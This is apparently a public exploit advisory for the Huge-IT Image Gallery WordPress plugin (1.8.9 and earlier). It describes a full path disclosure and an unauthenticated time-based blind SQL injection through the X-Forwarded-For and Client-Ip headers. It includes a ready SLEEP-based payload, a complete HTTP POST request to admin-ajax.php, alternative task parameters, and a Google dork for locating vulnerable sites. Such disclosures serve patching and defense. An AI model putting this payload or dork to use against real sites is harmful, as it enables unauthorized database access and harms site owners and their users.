# Exploit Title: WordPress plugin Image Gallery Full Path Disclosure and SQL Injection# Google Dork: inurl:"wp-content/plugins/gallery-images/"# Date: 12-05-2016# Software Link: https://fr.wordpress.org/plugins/gallery-images/# Version: 1.8.9 and prior# Exploit Author: Gwendal Le Coguic# Website: http://10degres.net# Category: webapps##### About #####
Huge-IT Image Gallery is the best plugin to use if you want to be original with your website.##### Full Path Disclosure #####
http://[target]/wp-content/plugins/gallery-images/gallery-images.php
##### SQL Injection #####
Headers X-Forwarded-For and Client-Ip are vulnerable.
Vulnerable code: at lines 101,259,420,559,698 the variable $huge_it_ip is missing sanitization
Payload:123.123.123.123' AND (SELECT * FROM (SELECT(SLEEP(5)))suRI) AND 'uDsL'='uDsL
POST /wp-admin/admin-ajax.php HTTP/1.1
Host:[target]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Client-Ip:123.123.123.123
X-Forwarded-For:123.123.123.123
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length:89
action=huge_it_video_gallery_ajax&task=load_images_content&galleryid=1&page=1&perpage=100### Extras infos #####
The "galleryid" must be configured ortry another id.
You don't need to be authed to exploit the injection but the plugin must be enable."task" parameter can be:
load_images_content
load_images_lightbox
load_image_justified
load_image_thumbnail
load_blog_view
Client-Ip overwrite X-Forwarded-For.
Some system drop those headers.##### References #####
https://www.owasp.org/index.php/Full_Path_Disclosure
https://www.owasp.org/index.php/SQL_Injection
